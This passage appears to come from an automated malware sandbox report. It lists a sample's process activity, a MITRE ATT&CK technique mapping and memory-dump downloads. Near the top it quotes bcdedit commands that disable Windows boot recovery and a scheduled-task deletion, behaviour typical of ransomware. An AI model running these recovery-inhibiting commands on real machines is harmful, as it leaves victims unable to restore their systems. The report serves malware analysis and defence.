  PID:4224
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} recoveryenabled No
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4860
- C:\Windows\system32\bcdedit.exe
  bcdedit /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4984
- C:\Windows\system32\schtasks.exe
  SCHTASKS /Delete /TN DSHCA /F
  2⤵
  PID:5040

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3740

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1808-140-0x00000000074F0000-0x0000000007556000-memory.dmp

Filesize
408KB

Download
memory/1808-145-0x0000000004415000-0x0000000004417000-memory.dmp

Filesize
8KB

Download
memory/1808-144-0x00000000080B0000-0x00000000080CA000-memory.dmp

Filesize
104KB

Download
memory/1808-143-0x0000000009360000-0x00000000099DA000-memory.dmp

Filesize
6.5MB

Download
memory/1808-142-0x0000000007BC0000-0x0000000007BDE000-memory.dmp

Filesize
120KB

Download
memory/1808-141-0x0000000007560000-0x00000000075C6000-memory.dmp

Filesize
408KB

Download
memory/1808-134-0x0000000000DF0000-0x0000000000E26000-memory.dmp

Filesize
216KB

Download
memory/1808-135-0x0000000073D70000-0x0000000074520000-memory.dmp

Filesize
7.7MB

Download
memory/1808-136-0x0000000004410000-0x0000000004411000-memory.dmp

Filesize
4KB

Download
memory/1808-137-0x0000000006E20000-0x0000000007448000-memory.dmp

Filesize
6.2MB

Download
memory/1808-138-0x0000000004412000-0x0000000004413000-memory.dmp

Filesize
4KB

Download
memory/1808-139-0x0000000006BE0000-0x0000000006C02000-memory.dmp

Filesize
136KB

Download